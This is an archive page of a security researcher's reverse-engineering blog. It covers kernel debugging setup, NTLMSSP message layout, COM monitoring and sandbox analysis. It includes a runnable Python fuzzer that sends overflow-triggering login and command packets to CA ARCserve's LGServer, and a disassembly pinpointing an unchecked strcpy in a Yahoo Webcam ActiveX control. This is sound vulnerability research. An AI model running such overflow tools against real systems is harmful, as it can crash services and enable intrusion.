
10 posts in the 'Reverse Engineering' category

  1. 2008/05/22 Binary diffing tools: research that used a different picture
  2. 2008/03/11 ActiveX monitoring tool
  3. 2008/01/21 Reassembling shredded documents
  4. 2007/10/29 Windows Vista Kernel Remote Debugging Tips
  5. 2007/10/24 Internet personal-information snooping tool: Maltego
  6. 2007/10/22 Multiple Vulnerabilities in CA ARCserve for Laptops & Desktops
  7. 2007/10/11 Basic NTLMSSP Parsing Scheme
  8. 2007/09/25 Disassembly of the Yahoo! Webcam ActiveX vulnerability
  9. 2007/09/25 Norman Sandbox Analyzer
  10. 2007/09/25 Diffing Result for MS 06-074
2008/05/22 11:13

Binary diffing tools: research that used a different picture

In Automatic Patch-Based Exploit Generation is Possible: Techniques and Implications, a different picture was used to analyze Microsoft patches.


We can use off-the-shelf tools to identify the vulnerability point and the added checks. In our implementation, we use EBDS [13], a tool that automatically compares two executables and reports the differences.



2008/03/11 18:43

ActiveX monitoring tool

There is a tool called COMSpy that a researcher who had been studying ActiveX vulnerabilities for a long time told me about. Of course, at that time I already knew a way of hooking the COM-related DLLs to monitor methods and their arguments, but that is "proprietary code".

COMSpy is open source, and although it uses a somewhat old (last updated in 1999) and complicated method, it gives a good idea of how COM works internally and how to hook it. It uses the classic hooking approach: it modifies the registry to register its own DLL for the interface it wants to hook, and then proxies the calls.


2008/01/21 19:26

Reassembling shredded documents

An interesting article I found while reading the print edition of WIRED. It is also up on the web.

How the CIA Used a Fake Sci-Fi Flick to Rescue Americans from Tehran



It is about the disguised escape of embassy staff during the Iran crisis (?) of the 80s; it could well be made into a movie. While reading it, though, I found one really interesting detail.



They had even hired teams of carpet weavers to successfully reassemble shredded documents. (The recovered papers would later be published by the Iranian government in a series of books called Documents From the US Espionage Den.)

At that time, the Iranian government hired carpet weavers to piece back together the shredded documents obtained from the abandoned US embassy.

I was curious and looked it up, and it turned out to be true.

Looking at pages 73 to 76 of the following document, what had gone through a document shredder has been meticulously pieced back together.

I salute the tremendous effort of the weavers.

http://www.thememoryhole.org/espionage_den/espionage_den01.pdf



















2007/10/29 17:15

Windows Vista Kernel Remote Debugging Tips

The method for remote debugging Windows inside VMware was introduced in Lord Of Ring0: Driver Debugging with WinDbg and VMWare. That method has saved me a great deal of effort in driver development and debugging as well.

However, when I first started driver development on Vista some months ago, the most bewildering part was setting up remote debugging. What used to be done simply by adding the following string to boot.ini has changed to require a set of complicated commands.


/debugport=com1 /baudrate=115200




A quick Google search turned up a document called Debugging Windows Vista. The document is rather long-winded, but if you simply follow the example below you can quickly create a boot entry with debugging enabled.

C:\Windows\system32>bcdedit /copy {current} /d DebugEntry

The entry was successfully copied to {919494ed-866b-11dc-bcb1-000c294d72db}.



C:\Windows\system32>bcdedit /debug {919494ed-866b-11dc-bcb1-000c294d72db} ON

The operation completed successfully.



C:\Windows\system32>bcdedit /default {919494ed-866b-11dc-bcb1-000c294d72db}

The operation completed successfully.



Of course, the random string between the braces {} in the middle changes from case to case, so take care to use the one bcdedit prints.



One more thing: on the windbg command line, the example in Lord Of Ring0: Driver Debugging with WinDbg and VMWare specifies resets=0, but on Vista, for whatever reason, that value had to be set to 1.

"C:\Program Files\Debugging Tools for Windows\windbg" -b -k com:pipe,port=\\.\pipe\com_1,resets=1



With that, everything is ready to dig into the Vista kernel.
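As an added example (not from the post), the three bcdedit steps above scripted in Python so that the entry GUID is read from the output of bcdedit /copy instead of being retyped, since it differs on every machine. The /dbgsettings line is an assumption not shown on the page: it carries the old boot.ini port and baud rate (com1, 115200) over to BCD as a global setting. The subprocess calls need an elevated prompt on Windows; parsing and command construction run anywhere.

```python
import re
import subprocess
import sys

# Sample output of "bcdedit /copy {current} /d DebugEntry", copied from the post
SAMPLE_COPY_OUTPUT = (
    "The entry was successfully copied to "
    "{919494ed-866b-11dc-bcb1-000c294d72db}.\n"
)

# A BCD entry identifier: {8-4-4-4-12 hex digits}
GUID_RE = re.compile(r"\{[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}\}", re.I)


def parse_copied_guid(output):
    """Return the GUID of the entry that bcdedit /copy just created, or None."""
    match = GUID_RE.search(output)
    return match.group(0).lower() if match else None


def debug_entry_commands(guid, port=1, baudrate=115200):
    """bcdedit commands that enable kernel debugging on the copied entry.
    The /dbgsettings line (assumed, not from the post) is the BCD equivalent of
    the boot.ini switches /debugport=com1 /baudrate=115200."""
    return [
        ["bcdedit", "/debug", guid, "ON"],
        ["bcdedit", "/dbgsettings", "SERIAL", f"DEBUGPORT:{port}", f"BAUDRATE:{baudrate}"],
        ["bcdedit", "/default", guid],
    ]


def create_debug_entry(description="DebugEntry", run=subprocess.run):
    """Copy {current}, then apply the debug commands to the new GUID.
    `run` is injectable so the flow can be exercised without bcdedit."""
    copied = run(["bcdedit", "/copy", "{current}", "/d", description],
                 capture_output=True, text=True, check=True)
    guid = parse_copied_guid(copied.stdout)
    if guid is None:
        raise RuntimeError("bcdedit /copy did not report a new entry GUID")
    for cmd in debug_entry_commands(guid):
        run(cmd, check=True)
    return guid


if __name__ == "__main__":
    if not sys.platform.startswith("win"):
        sys.exit("bcdedit is only available on Windows")
    print("debug boot entry:", create_debug_entry())
```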








2007/10/24 17:19

Internet personal-information snooping tool: Maltego



Paterva, a tool that was briefly introduced at Black Hat 2007, has been re-released under the name Maltego. There are GUI and web-interface versions; the GUI looks like the screenshot below. At present, however, the GUI version seems to have been suspended for a while.

After trying it briefly, its search capability is so powerful that it borders on dangerous. It is a tool that could cause considerable problems if misused.

http://www.paterva.com/web/Maltego/

[Image: Maltego GUI]

2007/10/22 11:31

Multiple Vulnerabilities in CA ARCserve for Laptops & Desktops

A bug I stumbled on a very long time ago...
http://research.eeye.com/html/advisories/published/AD20070920.html

It seems to have been published almost a year later.
A simple fuzzer for it looks like the following.

# CA BrightStor LGServer.exe Fuzzer
import sys
import socket


def MakeCommandStr(command, arguments):
    # LGServer wire format: a 10-digit decimal length prefix, then the command
    # name and its arguments, each argument separated by "~~"
    body = command
    for argument in arguments:
        body += "~~" + str(argument)
    return "%.10d" % len(body) + body


def FuzzyCommand(target, command_info):
    # Send a single command whose first argument is oversized
    debug = 2
    sockAddr = (target, 1900)
    tsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    tsock.settimeout(3)
    tsock.connect(sockAddr)
    packets = []
    packets.append(MakeCommandStr(command_info[0], ["A" * 3000]))
    for packet in packets:
        if debug > 0:
            print("=" * 80)
            print("Sending: ", packet)
        tsock.send(packet.encode("latin-1"))
        response = tsock.recv(1024)
        if debug > 0:
            print("Got: ", response)
            print("\n\n")
    tsock.close()


def SendRXRequests(target, method='Passwd Integer Overflow', Command="", argument_list=None):
    sockAddr = (target, 1900)
    tsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    tsock.settimeout(10)
    tsock.connect(sockAddr)

    # Each test case is a list of packets: the rxrLogin command, then the
    # password blob whose length the command announced
    packets = []
    if method == 'Login Overflow':
        passwd_str = "7631F40AA4F38B3007EBA24153F08EDB02"
        packets.append(MakeCommandStr("rxrLogin", ["administrator" + "A" * 1000, len(passwd_str)]))
        packets.append(passwd_str)
    elif method == 'Passwd Integer Overflow':
        packets.append(MakeCommandStr("rxrLogin", ["administrator", "18"]))
        packets.append("000000000000000000")
    elif method == 'Passwd Test':
        passwd_str = "7631F40AA4F38B3007EBA24153F08EDB02"
        packets.append(MakeCommandStr("rxrLogin", ["administrator", str(len(passwd_str))]))
        packets.append(passwd_str)
    elif method == 'Passwd Stack Overflow':
        passwd_str = "A" * 4 * 5000 + "02"
        packets.append(MakeCommandStr("rxrLogin", ["administrator", str(len(passwd_str))]))
        packets.append(passwd_str)
    elif method == 'Passwd Length Integer Overflow':
        # Not working well
        passwd_str = "AAAA"
        packets.append(MakeCommandStr("rxrLogin", ["administrator", 0xffffffff]))
        packets.append(passwd_str)
    elif method == 'Fuzzying':
        packets.append(MakeCommandStr(Command, argument_list or []))

    for packet in packets:
        print("=" * 80)
        print("Sending: ", packet)
        tsock.send(packet.encode("latin-1"))
        response = tsock.recv(1024)
        print("Got: ", response)
        print("\n\n")

    tsock.close()


if __name__ == '__main__':
    try:
        target = sys.argv[1]
    except IndexError:
        print('Usage: %s <target>' % sys.argv[0])
        sys.exit(-1)

    # [method name, command, argument list]
    Methods = []
    Methods.append(['Login Overflow', '', []])
    Methods.append(['Passwd Stack Overflow', '', []])
    Methods.append(['Passwd Integer Overflow', '', []])
    # Methods.append(['Passwd Length Integer Overflow', '', []])
    Methods.append(['Fuzzying', "rxsClearPassword", ["A" * 3000]])
    Methods.append(['Fuzzying', "rxsSetActive", ["A" * 3000]])
    Methods.append(['Fuzzying', "rxsRenameUser", ["A" * 3000, "A" * 3000]])
    Methods.append(['Fuzzying', "rxsDeleteUser", ["A" * 3000]])
    Methods.append(['Fuzzying', "rxsSetProtected", ["A" * 3000, "A" * 3000]])
    Methods.append(['Fuzzying', "rxsSetupRestoreUser", ["A" * 3000] * 8])
    Methods.append(['Fuzzying', "rxsDeleteFile", ["A" * 3000]])
    Methods.append(['Fuzzying', "rxcReadBackupSetList", ["A" * 3000]])
    Methods.append(['Fuzzying', "rxcCriticalSection", ["A" * 3000]])
    Methods.append(['Fuzzying', "rxsGetUserInfo", ["A" * 3000]])

    while True:
        number = 0

        print('=' * 50)
        print('BrightStor ARCserve Backup for Laptops and Desktops Killer:')
        print('CA BrightStor LGServer.exe Fuzzer')
        print('')
        for [method_name, func, arg] in Methods:
            number += 1
            print(number, method_name, func)
        print('')
        print(0, 'Exit')
        print('')
        print('')

        try:
            method_number = int(input("Which method do you want? "))
            print(method_number)
            if method_number == 0:
                break
            SendRXRequests(
                target,
                method=Methods[method_number - 1][0],
                Command=Methods[method_number - 1][1],
                argument_list=Methods[method_number - 1][2])
        except (ValueError, IndexError, OSError) as e:
            # Bad menu choice, or a connection/timeout error: report it and show the menu again
            print("Error:", e)

2007/10/11 15:47

Basic NTLMSSP Parsing Scheme

LMO Type

Field Name   Length   Value
Length       USHORT   Length of the message
Maxlen       USHORT   Maximum length of the message
Offset       DWORD    Offset of the start of the message

NTLMSSP Message

Field Name             Length     Value
NTLMSSP identifier     Fixed: 8   ASCII "NTLMSSP" + 0x0
NTLM message Type      DWORD
Lan Manager Response   LMO Type   Binary
NTLM Response          LMO Type   Binary
Domain name            LMO Type   Unicode w/o NULL termination
User name              LMO Type   Unicode w/o NULL termination
Host name              LMO Type   Unicode w/o NULL termination
Session Key            8 Bytes
Flags                  DWORD
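Added example, not part of the original post: a builder and a bounds-checked parser for the Type 3 message laid out in the tables above. The field order and the LMO (Length, Maxlen, Offset) layout follow the tables, integers are little-endian as on the wire, and the 8-byte Session Key field is treated as an LMO buffer (an assumption). The sample message is constructed, not captured; the offset check in read_lmo is the part a parser of untrusted traffic must not skip.

```python
import struct

SIGNATURE = b"NTLMSSP\x00"         # 8-byte identifier: ASCII "NTLMSSP" + 0x0
NTLMSSP_AUTH = 3                   # NTLM message Type of the authenticate (Type 3) message
HEADER_LEN = 8 + 4 + 6 * 8 + 4     # identifier, type, six LMO buffers, flags = 64 bytes
LMO_FIELDS = ("lm_response", "nt_response", "domain", "user", "host", "session_key")


def pack_lmo(data, offset):
    # LMO type: Length (USHORT), Maxlen (USHORT), Offset (DWORD), little-endian
    return struct.pack("<HHI", len(data), len(data), offset)


def build_type3(lm_resp, nt_resp, domain, user, host, session_key, flags):
    """Build a Type 3 message in the field order of the tables above.
    Strings go out as UTF-16LE without NUL termination; session_key is
    carried in an 8-byte LMO buffer (assumption, see lead-in)."""
    payloads = [lm_resp, nt_resp, domain.encode("utf-16-le"),
                user.encode("utf-16-le"), host.encode("utf-16-le"), session_key]
    lmos, body, offset = b"", b"", HEADER_LEN
    for data in payloads:          # payload data is appended after the fixed header
        lmos += pack_lmo(data, offset)
        body += data
        offset += len(data)
    return SIGNATURE + struct.pack("<I", NTLMSSP_AUTH) + lmos + struct.pack("<I", flags) + body


def read_lmo(msg, pos):
    """Resolve the LMO buffer stored at msg[pos:pos+8], refusing offsets that
    point outside the message instead of slicing blindly."""
    length, _maxlen, offset = struct.unpack_from("<HHI", msg, pos)
    if offset + length > len(msg):
        raise ValueError(f"LMO at {pos:#x} points outside the message")
    return msg[offset:offset + length]


def parse_type3(msg):
    """Parse a Type 3 message into a dict keyed by the field names above."""
    if len(msg) < HEADER_LEN or msg[:8] != SIGNATURE:
        raise ValueError("not a complete NTLMSSP message")
    (msg_type,) = struct.unpack_from("<I", msg, 8)
    if msg_type != NTLMSSP_AUTH:
        raise ValueError(f"expected NTLM message Type 3, got {msg_type}")
    fields, pos = {}, 12
    for name in LMO_FIELDS:        # six consecutive LMO headers follow the type
        fields[name] = read_lmo(msg, pos)
        pos += 8
    (fields["flags"],) = struct.unpack_from("<I", msg, pos)
    for name in ("domain", "user", "host"):
        fields[name] = fields[name].decode("utf-16-le")
    return fields


# Constructed sample, not a capture: 24-byte LM/NTLM responses, 16-byte session key
SAMPLE = build_type3(b"\x01" * 24, b"\x02" * 24, "CORP", "alice", "WS01",
                     b"\x07" * 16, 0x00088205)

if __name__ == "__main__":
    for key, value in parse_type3(SAMPLE).items():
        print(f"{key:12} {value!r}")
```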

2007/09/25 18:36

Disassembly of the Yahoo! Webcam ActiveX vulnerability


This is my own disassembly of the vulnerability described at the following link.

http://research.eeye.com/html/alerts/zeroday/20070606.html

The buffer overflow occurs at the call to strcpy. This routine can be reached through several different COM methods.

For the exploit, see http://archives.neohapsis.com/archives/fulldisclosure/2007-06/0131.html and http://archives.neohapsis.com/archives/fulldisclosure/2007-06/0133.html.




Disassembling

ywcvwr

02700000 02723000 ywcvwr C (export symbols) ywcvwr.dll


.text:03971000 ; Input MD5 : 75BB9620F65D004B02331B6EE87DEEA7

.text:03971000

.text:03971000 ; File Name : C:\Program Files\Yahoo!\Messenger\ywcvwr.dll

.text:03971000 ; Format : Portable executable for 80386 (PE)

.text:03971000 ; Imagebase : 10000000

.text:03971000 ; Section 1. (virtual address 00001000)

.text:03971000 ; Virtual size : 00015356 ( 86870.)

.text:03971000 ; Section size in file : 00016000 ( 90112.)

.text:03971000 ; Offset to raw data for section: 00001000

.text:03971000 ; Flags 60000020: Text Executable Readable

.text:03971000 ; Alignment : default

.text:03971000 ; OS type : MS Windows

.text:03971000 ; Application type: DLL 32bit

.text:03971000


Base in File: 03971000
Loaded: 02700000

Point of Interest: 027067bc
027067bc - 02700000 = 67bc
03971000 + 67bc = 39777BC; 39777BC - 00001000 = 39767BC


.text:039767A2 push eax ; char *

.text:039767A3 push 3FFh ; cbData

.text:039767A8 lea eax, [ebp-434h]

.text:039767AE push eax ; lpData

.text:039767AF push offset ValueName ; "WebcamServer"

.text:039767B4 lea ecx, [ebp-34h]

.text:039767B7 call sub_39731E9

.text:039767BC mov eax, [esi+2FCh]


0397676B

.text:0397676B or dword ptr [ebp-4], 0FFFFFFFFh

.text:0397676F test eax, eax

.text:03976771 mov [esi+2FCh], eax

.text:03976777 jz loc_3976867

.text:0397677D push 80000001h

.text:03976782 push offset aSoftwareYahooP ; "Software\\Yahoo\\Pager\\"

.text:03976787 lea ecx, [ebp-34h]

.text:0397678A call sub_397324C

.text:0397678F lea ecx, [esi+220h]

.text:03976795 mov dword ptr [ebp-4], 1

.text:0397679C call ds:?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ ; std::basic_string<char,std::char_traits<char>,std::allocator<char>>::c_str(void)


call sub_39731E9

.text:039767A2 push eax ; char *

.text:039767A3 push 3FFh ; cbData

.text:039767A8 lea eax, [ebp-434h]

.text:039767AE push eax ; lpData

.text:039767AF push offset ValueName ; "WebcamServer"

.text:039767B4 lea ecx, [ebp-34h]

.text:039767B7 call sub_39731E9

.text:039767BC mov eax, [esi+2FCh]

.text:039767C2 mov ebx, [eax]


call sub_39731E9

.text:0397C913 push 80000001h

.text:0397C918 push offset aSoftwareYahooP ; "Software\\Yahoo\\Pager\\"

.text:0397C91D lea ecx, [ebp-30h]

.text:0397C920 call sub_397324C

.text:0397C925 push offset aWebcam_yahoo_c ; "webcam.yahoo.com"

.text:0397C92A push 63h ; cbData

.text:0397C92C lea eax, [ebp-94h]

.text:0397C932 push eax ; lpData

.text:0397C933 push offset ValueName ; "WebcamServer"

.text:0397C938 lea ecx, [ebp-30h]

.text:0397C93B mov byte ptr [ebp-4], 11h

.text:0397C93F call sub_39731E9

sub_39731E9

.text:039731E9 ; int __stdcall sub_39731E9(LPCSTR lpValueName,char *lpData,DWORD cbData,char *)

.text:039731E9 sub_39731E9 proc near ; CODE XREF: sub_397671E+99#p

.text:039731E9 ; sub_397C7C5+17A#p

.text:039731E9

.text:039731E9 Type= dword ptr -8

.text:039731E9 hKey= dword ptr -4

.text:039731E9 lpValueName= dword ptr 8

.text:039731E9 lpData= dword ptr 0Ch

.text:039731E9 cbData= dword ptr 10h

.text:039731E9 arg_C= dword ptr 14h

.text:039731E9

.text:039731E9 push ebp

.text:039731EA mov ebp, esp

.text:039731EC push ecx

.text:039731ED push ecx

.text:039731EE and [ebp+Type], 0

.text:039731F2 push esi

.text:039731F3 mov esi, ecx

.text:039731F5 lea eax, [ebp+hKey]

.text:039731F8 push eax ; phkResult

.text:039731F9 lea ecx, [esi+4]

.text:039731FC call ds:?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ ; std::basic_string<char,std::char_traits<char>,std::allocator<char>>::c_str(void)

.text:03973202 push eax ; lpSubKey

.text:03973203 push dword ptr [esi] ; hKey

.text:03973205 call ds:RegOpenKeyA

.text:0397320B test eax, eax

.text:0397320D pop esi

.text:0397320E jnz short loc_3973232

.text:03973210 lea eax, [ebp+cbData]

.text:03973213 push eax ; lpcbData

.text:03973214 push [ebp+lpData] ; lpData

.text:03973217 lea eax, [ebp+Type]

.text:0397321A push eax ; lpType

.text:0397321B push 0 ; lpReserved

.text:0397321D push [ebp+lpValueName] ; lpValueName

.text:03973220 push [ebp+hKey] ; hKey

.text:03973223 call ds:RegQueryValueExA

.text:03973229 push [ebp+hKey] ; hKey

.text:0397322C call ds:RegCloseKey

.text:03973232

.text:03973232 loc_3973232: ; CODE XREF: sub_39731E9+25#j

.text:03973232 cmp [ebp+Type], 1

.text:03973236 jz short loc_3973245

call strcpy

.text:03973238 push [ebp+arg_C] ; char *

.text:0397323B push [ebp+lpData] ; char *

.text:0397323E call strcpy

.text:03973243 pop ecx

.text:03973244 pop ecx

.text:03973245

.text:03973245 loc_3973245: ; CODE XREF: sub_39731E9+4D#j

.text:03973245 mov eax, [ebp+lpData]

.text:03973248 leave

.text:03973249 retn 10h

.text:03973249 sub_39731E9 endp






2007/09/25 17:09

Norman Sandbox Analyzer

Example session (screenshots): Startup; Setting Filename and options; Start; Completed; Results

SandBox Summary

Using profile C:\Program Files\Norman SandBox Analyzer\Profiles\default.ini

E:\mat\Files\regscan.ex_ : OK

====> Sandbox output:

[ DetectionInfo ]

* Sandbox name:

* Signature name: NOT_SCANNED

[ General information ]

* **IMPORTANT: PLEASE SEND THE SCANNED FILE TO: ANALYSIS@NORMAN.NO - REMEMBER TO ENCRYPT IT (E.G. ZIP WITH PASSWORD)**.

* File length: 334848 bytes.

* MD5 hash: f3387d5351199ad06173bafbe52165d3.

Files checked : 1

Unpacked file saved to: C:\Program Files\Norman SandBox Analyzer\files\Unpacked\regscan.unp



API Log
